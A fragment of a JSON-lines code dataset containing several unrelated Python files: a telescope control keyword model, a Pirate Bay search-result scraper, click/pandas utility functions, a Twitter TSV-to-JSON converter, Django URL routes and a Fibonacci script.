= pvtVarFact(\n keyword = \"ObjOff\",\n naxes = 2,\n description = \"Object offset (user coords)\",\n )\n\n self.objArcOff = pvtVarFact(\n keyword = \"ObjArcOff\",\n naxes = 2,\n description = \"Object arc offset (user coords)\",\n )\n\n self.rotType = keyVarFact(\n keyword = \"RotType\",\n converters = _cnvRotType,\n description = \"Type of rotation\",\n )\n\n self.rotPos = pvtVarFact(\n keyword = \"RotPos\",\n naxes = 1,\n description = \"Rotation angle\",\n )\n\n self.rotExists = keyVarFact(\n keyword = \"RotExists\",\n converters = RO.CnvUtil.asBool,\n description = \"Type of rotation\",\n isLocal = True,\n )\n\n self.boresight = pvtVarFact(\n keyword = \"Boresight\",\n naxes = 2,\n description = \"Boresight position (inst x,y)\",\n )\n\n self.calibOff = pvtVarFact(\n keyword = \"CalibOff\",\n naxes = 3,\n description = \"Calibration offset (az, alt, rot)\",\n )\n\n self.guideOff = pvtVarFact(\n keyword = \"GuideOff\",\n naxes = 3,\n description = \"Guiding offset (az, alt, rot)\",\n )\n\n # time\n\n self.tai = keyVarFact(\n keyword = \"TAI\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n refreshCmd = \"show time\", # can't use archived data!\n description = \"TAI time (MJD sec)\",\n )\n\n self.utcMinusTAI = keyVarFact(\n keyword = \"UTC_TAI\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"UTC time - TAI time (sec)\",\n )\n\n # slew info; do not try to refresh these keywords\n\n self.moveItems = keyVarFact(\n keyword = \"MoveItems\",\n nval = 1,\n converters = str,\n description = \"\"\"Indicates which user-set position attributes have been changed for a move.\n\nThis keyword always appears with Moved or SlewBeg, and never appears any other time.\nThe value is a string containing the following characters, each of which is either\n\"Y\" (yes, this item changed) or \"N\" (no, this item did not change):\n0 object name\n1 any of object position, coordinate system, epoch, proper motion, etc., but NOT offset (see below)\n2 object magnitude\n3 object offset\n4 arc offset (e.g. for drift-scanning)\n5 boresight position\n6 rotator angle or type of rotation\n7 guide offset\n8 calibration offset\n\"\"\",\n allowRefresh = False,\n )\n\n self.slewDuration = keyVarFact(\n keyword=\"SlewDuration\",\n converters=RO.CnvUtil.asFloatOrNone,\n description = \"Duration of the slew that is beginning (sec)\",\n allowRefresh = False,\n )\n\n self.slewEnd = keyVarFact(\n keyword = \"SlewEnd\",\n nval = 0,\n description = \"Slew ended\",\n allowRefresh = False,\n )\n\n self.slewSuperseded = keyVarFact(\n keyword = \"SlewSuperseded\",\n nval = 0,\n description = \"Slew superseded\",\n allowRefresh = False,\n )\n\n # computed information about the object\n\n self.objInstAng = pvtVarFact(\n keyword = \"ObjInstAng\",\n naxes = 1,\n description = \"angle from inst x to obj user axis 1 (e.g. RA)\",\n )\n\n self.spiderInstAng = pvtVarFact(\n keyword = \"SpiderInstAng\",\n naxes = 1,\n description = \"angle from inst x to dir. of increasing az\",\n )\n\n keyVarFact.setKeysRefreshCmd()\n\n # information about the axes\n\n self.tccStatus = keyVarFact(\n keyword = \"TCCStatus\",\n nval = 2,\n converters = str,\n description = \"What the TCC thinks the axes are doing\",\n )\n\n self.axisCmdState = keyVarFact(\n keyword = \"AxisCmdState\",\n nval = 3,\n converters = str,\n description = \"What the TCC has told the azimuth, altitude and rotator to do\",\n )\n\n self.axisErrCode = keyVarFact(\n keyword = \"AxisErrCode\",\n nval = 3,\n converters = RO.CnvUtil.StrCnv(subsDict = {\"OK\":\"\"}),\n description = \"Why the TCC is not moving azimuth, altitude and/or the rotator\",\n )\n\n self.tccPos = keyVarFact(\n keyword = \"TCCPos\",\n nval = 3,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Target position of azimuth, altitude and rotator (limited accuracy)\",\n )\n\n self.axePos = keyVarFact(\n keyword = \"AxePos\",\n nval = 3,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual position of azimuth, altitude and rotator (limited accuracy)\",\n )\n\n self.azLim = keyVarFact(\n keyword = \"AzLim\",\n nval = 5,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Azimuth limits: min pos, max pos, vel, accel, jerk\",\n )\n\n self.altLim = keyVarFact(\n keyword = \"AltLim\",\n nval = 5,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Altitude limits: min pos, max pos, vel, accel, jerk\",\n )\n\n self.rotLim = keyVarFact(\n keyword = \"RotLim\",\n nval = 5,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Rotator limits: min pos, max pos, vel, accel, jerk\",\n )\n\n self.rotOffsetScale = keyVarFact(\n keyword = \"RotOffsetScale\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Rotator offset, scale: mount position = offset + (physical position * scale).\",\n )\n\n # a set of controller status variables for each axis;\n # the entry for each axis consists of:\n # current position, velocity, time, status word\n #\n # the rotator does not have a refresh command because it may not exist\n self.ctrlStatusSet = [\n keyVarFact(\n keyword = \"%sStat\" % axisName,\n nval = 4,\n converters = (RO.CnvUtil.asFloatOrNone, RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone, RO.CnvUtil.asIntOrNone),\n description = \"%s controller status word\" % axisName,\n refreshOptional = (axisName == self.axisNames[-1]),\n ) for axisName in self.axisNames\n ]\n\n # instrument data\n\n self.instName = keyVarFact(\n keyword = \"Inst\",\n converters = str,\n description = \"Name of current instrument\",\n )\n\n self.instPos = keyVarFact(\n keyword = \"InstPos\",\n converters = str,\n description = \"Name of current instrument position\",\n )\n\n self.ipConfig = keyVarFact(\n keyword = \"IPConfig\",\n converters = str,\n description = \"\"\"Instrument-position configuration, e.g. is an instrument rotator available?\n\nstr contains the following elements, each of which is either \"T\" (true) or \"N\" (false):\n\ninstrument rotator is available\nguide camera is available\nguider mechanical controller is available\n\"\"\",\n )\n self.ipConfig.addIndexedCallback(self._updRotExists)\n\n self.instFocus = keyVarFact(\n keyword = \"InstFocus\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Secondary mirror focus offset due to instrument (um)\",\n )\n\n self.iimCtr = keyVarFact(\n keyword = \"IImCtr\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Center of current instrument (unbinned pixels)\",\n )\n\n self.iimLim = keyVarFact(\n keyword = \"IImLim\",\n nval = 4,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Edges of current instrument (min x, min y, max x, max y) (unbinned pixels)\",\n )\n\n self.iimScale = keyVarFact(\n keyword = \"IImScale\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Scale of current instrument (unbinned pixels/deg)\",\n )\n\n self.rotInstXYAng = keyVarFact(\n keyword = \"RotInstXYAng\",\n nval = 3,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Position of the center of the instrument rotator in instrument coordinate frame (x, y deg) \" +\n \"and angle of instrument rotator x axis in instrument coordinate frame (deg).\",\n )\n\n # guider data\n\n self.gimCtr = keyVarFact(\n keyword = \"GImCtr\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Center of current guider (unbinned pixels)\",\n )\n\n self.gimLim = keyVarFact(\n keyword = \"GImLim\",\n nval = 4,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Edges of current guider (min x, min y, max x, max y) (unbinned pixels)\",\n )\n\n self.gimScale = keyVarFact(\n keyword = \"GImScale\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Scale of current guider (unbinned pixels/deg)\",\n )\n\n self.gcFocus = keyVarFact(\n keyword = \"GCFocus\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"User-specified focus offset for guide camera (um).\",\n )\n\n self.gcFocusLim = keyVarFact(\n keyword = \"GCFocusLim\",\n nval = 2,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Limits of travel for guide camera focus actuator (um)\",\n )\n\n self.gcNomFocus = keyVarFact(\n keyword = \"GCNomFocus\",\n nval = 1,\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Nominal position for guide camera focus actuator (um).\",\n )\n\n self.ptErrProbe = keyVarFact(\n keyword = \"PtErrProbe\",\n nval = 1,\n converters = RO.CnvUtil.asIntOrNone,\n description = \"Guide probe to use for pointing error data collection; 0 if none.\",\n )\n\n self.gProbeInfo = keyVarFact(\n keyword = \"GProbeInfo\",\n converters = (\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asBool,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Information about one guide probe:\n - guide probe number (1...N)\n - exists?\n - x center (pixels)\n - y center (pixels)\n - min x (pixels)\n - min y (pixels)\n - max x (pixels)\n - max y (pixels)\n - x position of center of guide probe w.r.t. rotator (deg)\n - y position of center of guide probe w.r.t. rotator (deg)\n - angle from probe image x to rotator x (deg)\n \"\"\",\n allowRefresh = False,\n )\n self.gProbeDict = OrderedDict() # dict of guide probe number: GuideProbe object; based on GProbeInfo keyword\n self.gProbeInfo.addCallback(self._updGProbeDict)\n\n # miscellaneous\n\n self.ptCorr = keyVarFact(\n keyword = \"PtCorr\",\n converters = (\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Measured pointing error in a form suitable for guiding\n (thus, relative to current guide and calibration offsets).\n All values are in the pointing frame, which is the rotator frame rotated such that x = az\n - az pointing correction on the sky (deg)\n - alt pointing correction on the sky (deg)\n - x position in pointing frame (deg)\n - y position in pointing frame (deg)\n \"\"\",\n allowRefresh = False,\n )\n\n self.ptData = keyVarFact(\n keyword = \"PtData\",\n converters = (\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Measured pointing error in a form suitable for pointing model data\n - az desired physical position (deg)\n - alt desired physical position (deg)\n - az current mount position (deg)\n - alt current mount position (deg)\n - rot physical angle (deg)\n \"\"\",\n allowRefresh = False,\n )\n\n self.ptRefStar = keyVarFact(\n keyword = \"PtRefStar\",\n converters = (\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n str,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Information about a pointing reference star:\n - equatorial position (deg)\n - polar position (deg)\n - parallax (arcsec)\n - equatorial proper motion (dEquatAng/dt as arcsec/year)\n - polar proper motion (arcsec/year)\n - radial velocity (km/sec, positive receding)\n - coordinate system name\n - coordinate system date\n - magnitude\n \"\"\",\n allowRefresh = False,\n )\n\n self.secFocus = keyVarFact(\n keyword = \"SecFocus\",\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"User-defined focus offset\",\n )\n\n # mirrors\n\n self.secActMount = keyVarFact(\n keyword = \"SecActMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual mount position\",\n )\n\n self.secCmdMount = keyVarFact(\n keyword = \"SecCmdMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Commanded mount position\",\n )\n\n self.secDesOrient = keyVarFact(\n keyword = \"SecDesOrient\",\n nval = (5,6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.secOrient = keyVarFact(\n keyword = \"SecOrient\",\n nval = (5,6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.secOrientAge = keyVarFact(\n keyword = \"SecOrientAge\",\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Age of most recent computation of desired orientation, in sec.\"\n )\n\n self.secDesEncMount = keyVarFact(\n keyword = \"SecDesEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Measured encoder length (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.secEncMount = keyVarFact(\n keyword = \"SecEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired encoder length based on desired orientation (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.secState = keyVarFact(\n keyword = \"SecState\",\n converters = (\n str,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Mirror controller state:\n - state string, such as: \"Done\", \"Homing\", \"Moving\" or \"Failed\",\n - iteration\n - max iterations\n - remaining duration (sec)\n - total duration (sec)\n \"\"\",\n )\n\n self.secStatus = keyVarFact(\n keyword = \"SecStatus\",\n nval = (1, 6),\n converters = RO.CnvUtil.asIntOrNone,\n description = \"Status reported by each actuator.\"\n )\n\n\n self.tertActMount = keyVarFact(\n keyword = \"TertActMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual mount position\",\n )\n\n self.tertCmdMount = keyVarFact(\n keyword = \"TertCmdMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Commanded mount position\",\n )\n\n self.tertDesOrient = keyVarFact(\n keyword = \"TertDesOrient\",\n nval = (5,6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.tertOrient = keyVarFact(\n keyword = \"TertOrient\",\n nval = (5, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Actual orientation (piston, x_tilt, y_tilt, x_trans, y_trans)\",\n )\n\n self.tertOrientAge = keyVarFact(\n keyword = \"TertOrientAge\",\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Age of most recent computation of desired orientation, in sec.\"\n )\n\n self.tertDesEncMount = keyVarFact(\n keyword = \"TertDesEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Desired encoder length based on desired orientation (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.tertEncMount = keyVarFact(\n keyword = \"TertEncMount\",\n nval = (1, 6),\n converters = RO.CnvUtil.asFloatOrNone,\n description = \"Measured encoder length (actuator microsteps); \" + \\\n \"for actuators without an encoder, this will be commanded mount\",\n )\n\n self.tertState = keyVarFact(\n keyword = \"TertState\",\n converters = (\n str,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asIntOrNone,\n RO.CnvUtil.asFloatOrNone,\n RO.CnvUtil.asFloatOrNone,\n ),\n description = \"\"\"Mirror controller state:\n - state string, such as: \"Done\", \"Homing\", \"Moving\" or \"Failed\",\n - iteration\n - max iterations\n - remaining duration (sec)\n - total duration (sec)\n \"\"\",\n )\n\n self.tertStatus = keyVarFact(\n keyword = \"TertStatus\",\n nval = (1, 6),\n converters = RO.CnvUtil.asIntOrNone,\n description = \"Status reported by each actuator.\"\n )\n\n # guiding state; do not try to refresh\n\n self.guidePrep = keyVarFact(\n keyword = \"GuidePrep\",\n nval = 0,\n description = \"Guiding is preparing to start\",\n allowRefresh = False,\n )\n\n self.guideStart = keyVarFact(\n keyword = \"GuideStart\",\n nval = 0,\n description = \"Guiding begins\",\n allowRefresh = False,\n )\n\n keyVarFact.setKeysRefreshCmd()\n pvtVarFact.setKeysRefreshCmd()\n\n def _updRotExists(self, ipConfig, isCurrent, **kargs):\n \"\"\"Call when the TCC outputs ipConfig and use to set self.rotExists\n \"\"\"\n if not ipConfig:\n return\n hasRotChar = ipConfig[0]\n rotExists = (hasRotChar.lower() == \"t\")\n if (rotExists, isCurrent) != self.rotExists.getInd(0):\n self.rotExists.set((rotExists,), isCurrent)\n #print \"TCCModel._updRotExists: rotExists=%s, isCurrent=%s\" % tuple(self.rotExists.getInd(0))\n\n def _updGProbeDict(self, valueList, isCurrent, **kargs):\n \"\"\"Call when the TCC outputs gProbeInfo and use to update self.gProbeDict\n \"\"\"\n if valueList[0] is None:\n return\n guideProbe = GuideProbe(valueList)\n if guideProbe.number == 1:\n self.gProbeDict = OrderedDict()\n self.gProbeDict[guideProbe.number] = guideProbe\n\nclass GuideProbe(object):\n \"\"\"Information about one guide probe\n \"\"\"\n def __init__(self, valueList):\n self.number = valueList[0]\n self.exists = valueList[1]\n self.ctrXY = (valueList[2], valueList[3])\n self.minXY = (valueList[4], valueList[5])\n self.maxXY = (valueList[6], valueList[7])\n self.gp_rot_xy = (valueList[8], valueList[9])\n self.rot_gim_ang = valueList[10]\n\nif __name__ == \"__main__\":\n # confirm compilation\n model = getModel()\n","sub_path":"TUI/TCC/TCCModel.py","file_name":"TCCModel.py","file_ext":"py","file_size_in_byte":27808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"248895879","text":"from config.exceptions.NoHTMLException import NoHTMLException\nfrom config.exceptions.NoResultsFound import NoResultsFound\nfrom config.exceptions.ParseHTMLException import ParseHTMLException\nfrom TorrentProviders.GeneralTorrentProvider import GeneralTorrentProvider\nfrom TorrentProviders.Torrent import _Torrent\nfrom config import Common\n\nclass ThePirateBay(GeneralTorrentProvider):\n def __init__(self):\n super().__init__(\"The Pirate Bay\")\n\n def _get_html(self):\n try:\n search = \"/search/%s/\" % (self.title)\n self.soup = Common.getUrlSoup(self.proxy + search)\n print(\"fetching\")\n print(\"fetched\")\n except Exception as e:\n print(e)\n raise NoHTMLException(e)\n\n def _parse_html(self):\n try:\n content = self.soup.find('table', id=\"searchResult\")\n \n if content is None:\n message = \"No results found for given input!\"\n print(message)\n raise NoResultsFound(message)\n \n self.showTorrentList = list()\n \n data = content.find_all('tr')\n for i in data[1:]:\n \n torrent = _Torrent()\n \n torrent.name = i.find('a', class_='detLink').string\n torrent.uploader = i.find('font', class_=\"detDesc\").a\n if torrent.name is None:\n torrent.name = i.find('a', class_='detLink')['title'].split(\" \")[2:]\n torrent.name = \" \".join(str(x) for x in torrent.name)\n if torrent.uploader is None:\n torrent.uploader = i.find('font', class_=\"detDesc\").i.string\n else:\n torrent.uploader = torrent.uploader.string\n if self.OS_WIN:\n torrent.name = torrent.name.encode('ascii', 'replace').decode()\n comments = i.find(\n 'img', {'src': '//%s/static/img/icon_comment.gif' % (self.proxy.split('/')[2])})\n if comments is None:\n torrent.comment = '0'\n else:\n torrent.comment = comments['alt'].split(\" \")[-2]\n is_vip = i.find('img', {'title': \"VIP\"})\n is_trusted = i.find('img', {'title': 'Trusted'})\n if(is_vip is not None):\n torrent.isVIP = True\n elif(is_trusted is not None):\n torrent.isTrusted = True\n torrent.category = i.find('td', class_=\"vertTh\").find_all('a')[0].string\n torrent.subCategory = i.find('td', class_=\"vertTh\").find_all('a')[1].string\n torrent.seeds = int(i.find_all('td', align=\"right\")[0].string.strip())\n torrent.leeches = int(i.find_all('td', align=\"right\")[1].string.strip())\n torrent.date = i.find('font', class_=\"detDesc\").get_text().split(' ')[1].replace(',', \"\")\n torrent.size = Common.getSize(i.find('font', class_=\"detDesc\").get_text().split(' ')[3].replace(',', \"\"))\n torrent.torrentID = i.find('a', {'class': 'detLink'})[\"href\"].split('/')[2]\n torrent.link = \"%s/torrent/%s\" % (self.proxy, torrent.torrentID)\n torrent.magnet = (i.find_all('a', {'title': 'Download this torrent using magnet'})[0]['href']).replace(\"&\", \"&\")\n \n self._addTorrent(torrent)\n \n print(\"Results fetched successfully!\")\n except Exception as e:\n print(e)\n raise ParseHTMLException(e)\n\n \n def getEpisodes(self, episodesList):\n torrentsList = []\n for episode in episodesList:\n searchString = episode.show.title + \" S\" + format(episode.season, '02') + \"E\" + format(episode.episode, '02')\n selectedTorrent = self.getTorrents(searchString).selectedTorrent\n if (selectedTorrent is not None):\n selectedTorrent.traktId=episode.show.traktid\n torrentsList.append(selectedTorrent)\n return torrentsList\n","sub_path":"TorrentProviders/ThePirateBay.py","file_name":"ThePirateBay.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"21651725","text":"import click\nimport sys\nimport pandas as pd\n\n# Fix Python 2.x.\ntry:\n UNICODE_EXISTS = bool(type(unicode))\nexcept NameError:\n unicode = lambda s: str(s)\n\n\ndef printDebug(text, mystyle=\"\", **kwargs):\n \"\"\"\n util for printing in colors using click.secho()\n\n :kwargs = you can do printDebug(\"s\", bold=True)\n\n 2018-12-06: by default print to standard error (err=True)\n\n Styling output:\n \n Styles a text with ANSI styles and returns the new string. By default the styling is self contained which means that at the end of the string a reset code is issued. This can be prevented by passing reset=False.\n\n Examples:\n\n click.echo(click.style('Hello World!', fg='green'))\n click.echo(click.style('ATTENTION!', blink=True))\n click.echo(click.style('Some things', reverse=True, fg='cyan'))\n Supported color names:\n\n black (might be a gray)\n red\n green\n yellow (might be an orange)\n blue\n magenta\n cyan\n white (might be light gray)\n reset (reset the color code only)\n New in version 2.0.\n\n Parameters:\n text – the string to style with ansi codes.\n fg – if provided this will become the foreground color.\n bg – if provided this will become the background color.\n bold – if provided this will enable or disable bold mode.\n dim – if provided this will enable or disable dim mode. This is badly supported.\n underline – if provided this will enable or disable underline.\n blink – if provided this will enable or disable blinking.\n reverse – if provided this will enable or disable inverse rendering (foreground becomes background and the other way round).\n reset – by default a reset-all code is added at the end of the string which means that styles do not carry over. This can be disabled to compose styles.\n\n \"\"\"\n\n if mystyle == \"comment\":\n click.secho(text, dim=True, err=True)\n elif mystyle == \"important\":\n click.secho(text, bold=True, err=True)\n elif mystyle == \"normal\":\n click.secho(text, reset=True, err=True)\n elif mystyle == \"red\" or mystyle == \"error\":\n click.secho(text, fg='red', err=True)\n elif mystyle == \"green\":\n click.secho(text, fg='green', err=True)\n else:\n click.secho(text, **kwargs)\n\n\n\n\ndef slugify(value):\n \"\"\"\n Normalizes string, converts to lowercase, removes non-alpha characters,\n and converts spaces to hyphens.\n http://stackoverflow.com/questions/295135/turn-a-string-into-a-valid-filename-in-python\n \"\"\"\n import unicodedata, re\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s-]', '', value.decode()).strip().lower())\n value = re.sub('[-\\s]+', '-', value)\n return value\n\n\n\ndef safe_str(u, errors=\"replace\"):\n \"\"\"Safely print the given string.\n\n If you want to see the code points for unprintable characters then you\n can use `errors=\"xmlcharrefreplace\"`.\n http://code.activestate.com/recipes/576602-safe-print/\n \"\"\"\n s = u.encode(sys.stdout.encoding or \"utf-8\", errors)\n return s\n\n\n\n\ndef print_stats_score(concepts_unique):\n \"\"\"From a concepts_unique dataframe, print out useful stats.\n\n Parameters\n ----------\n concepts_unique : pandas.DataFrame\n concepts_unique dataframe\n \"\"\" \n\n c = concepts_unique\n click.secho(f\"\"\"Total number of concepts: \n {len(c)}\"\"\")\n\n # score bins\n filter_values = [0, 0.5, 0.6, 0.8, 0.9, 1] \n out = pd.cut(c.score_avg, bins=filter_values)\n counts = pd.value_counts(out).sort_index().to_list()\n\n click.secho(f\"\"\"Score distribution (min={c.score_avg.min()} max={c.score_avg.max()} mean={\"%.2f\" % c.score_avg.mean()}):\"\"\")\n for n,v in enumerate(filter_values):\n if n < len(counts): # because filter values are taken two at a time\n click.secho(f\"\"\"\\t{filter_values[n]}-{filter_values[n+1]}: {counts[n]}\"\"\")\n\n\n\ndef print_stats_freq(concepts_unique):\n \"\"\"From a concepts_unique dataframe, print out useful stats.\n\n Parameters\n ----------\n concepts_unique : pandas.DataFrame\n concepts_unique dataframe\n \"\"\" \n\n c = concepts_unique\n click.secho(f\"\"\"Total number of concepts: \n {len(c)}\"\"\")\n\n # freq bins\n filter_values = [0, 1, 2, 3, 4, 5, c.frequency.max()] \n out = pd.cut(c.frequency, bins=filter_values)\n counts = pd.value_counts(out).sort_index().to_list()\n\n click.secho(f\"\"\"Frequency distribution (min={c.frequency.min()} max={c.frequency.max()}): \n 1: {counts[0]} concepts\n 2: {counts[1]}\n 3: {counts[2]}\n 4: {counts[3]}\n 5: {counts[4]}\n 6-{c.frequency.max()}: {counts[5]}\"\"\")\n\n\n\n\ndef print_parameters(min_score, min_freq, min_edge_weight):\n \"\"\"Prints out parameters used for the dataviz\"\"\"\n\n # average no of concepts per document\n click.secho(f\"\"\"**Filter parameters \"\"\")\n click.secho(f\"\"\"min_score: {min_score}\"\"\")\n click.secho(f\"\"\"min_freq: {min_freq}\"\"\")\n click.secho(f\"\"\"min_edge_weight: {min_edge_weight}\"\"\")\n\n\n\n\ndef dsl_extract_search_terms(dslquery):\n \"\"\"Return the inner keyword search parameter from a DSL query. \n IE just the stuff in quotes.\n\n Returns the query terms WITHOUT the outer quotes eg \n\n \\\"cell division\\\" AND spiders\n\n Parameters\n ----------\n dslquery : string\n Full DSL query eg \n 'search publications for \"napoleon\" return publications[id+concepts_scores] limit 500'\n \"\"\"\n #TODO improve\n l = dslquery.split()\n try:\n if \"where\" in l:\n candidates = l[l.index(\"for\")+1:l.index(\"where\")]\n else:\n candidates = l[l.index(\"for\")+1:l.index(\"return\")]\n except:\n printDebug(\"Error with ..\")\n return \"\"\n data = \" \".join(candidates)\n return data[1:len(data)-1] # remove outer quotes\n\n\n\n\n# import json\n# \"{json.dumps(keywords)}\" \n\ndef dsl_generate_query_from_search_keywords(keywords):\n \"\"\"Auto generate a valid DSL query\"\"\"\n # print(keywords)\n newk = keywords.replace('\"', '\\\\\"')\n # print(newk)\n q = f\"\"\"search publications \n for \"{newk}\" \n where concepts is not empty\n return publications[id+concepts_scores] \n sort by times_cited limit 1000\"\"\"\n return q \n","sub_path":"dice/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"381229508","text":"#!/usr/bin/env python3\n# -*-coding : utf-8 -*-\n# author : Chris\n# date : '15-9-9'\n# description: some description here...\n\n__author__ = 'Chris'\n\n\nfrom urllib import request\n\ndef fetch_xml():\n with request.urlopen('http://www.baidu.com') as f:\n data = f.read()\n d={}\n for k, v in f.getheaders():\n d[k]=v\n d['Data']=data.decode('utf-8')\n return d\n\nprint(fetch_xml())","sub_path":"12.常用的内建库/urllib_test.py","file_name":"urllib_test.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"489672642","text":"#!/usr/bin/python\n\nimport csv\nimport json\nimport api_twitter\n\nimport config\ntoken = config.load_token('/vagrant/config/twitter.json')\n\npath = '/vagrant/tmp/sample_user1.tsv'\n\nwith open(path, newline='', encoding='utf-8') as file:\n csv_reader = csv.reader(file, delimiter='\\t')\n tweets = []\n i = 0\n for row in csv_reader:\n i += 1\n print(i)\n tweet = api_twitter.tweet(token, row[0])\n if tweet is None:\n continue\n tweet['X_sentiment'] = row[6]\n tweets.append(tweet)\n\nwith open('/vagrant/tmp/sample_user2.json', 'w') as file:\n json.dump(tweets, file, sort_keys=True)\n\n","sub_path":"src/jp_tweets/tsv2json.py","file_name":"tsv2json.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"822297","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic.simple import direct_to_template\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Main:\n (r'^$', direct_to_template, {'template': 'index.html'}),\n (r'^index.html$', direct_to_template, {'template': 'index.html'}),\n\n # API:\n url(r'^api/1/', include('api.urls')),\n)\n","sub_path":"emberplay/emberplay/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"233978783","text":"#!/usr/bin/python3\n#Created by Harrison Barnett 11 Aug 17\n#Created for Comp1531 Lab2 Exercise\ns=int(input(\"How many numbers in series?: \"))\n\ncount = 0\nfib1 = 1\nfib2 = 0\ntemp = 0\nwhile (count < s):\n\tif count <= 0:\n\t\tprint(\"1\")\n\t\tcount = count+1\n\telse:\n\t\tprint(fib1+fib2)\n\t\ttemp = fib2\n\t\tfib2 = fib1\n\t\tfib1 = fib1+temp\n\t\tcount = count+1\n\n","sub_path":"lab2/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"127073132","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n##\n# Project: GNOME App Folders Manager\n# Description: Manage GNOME Shell applications folders\n# Author: Fabio Castelli (Muflone) \n# Copyright: 2016-2017 Fabio Castelli\n# License: GPL-2+\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the Free\n# Software Foundation; either version 2 of the License, or (at your option)\n# any later version.\n#\n# This program is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A 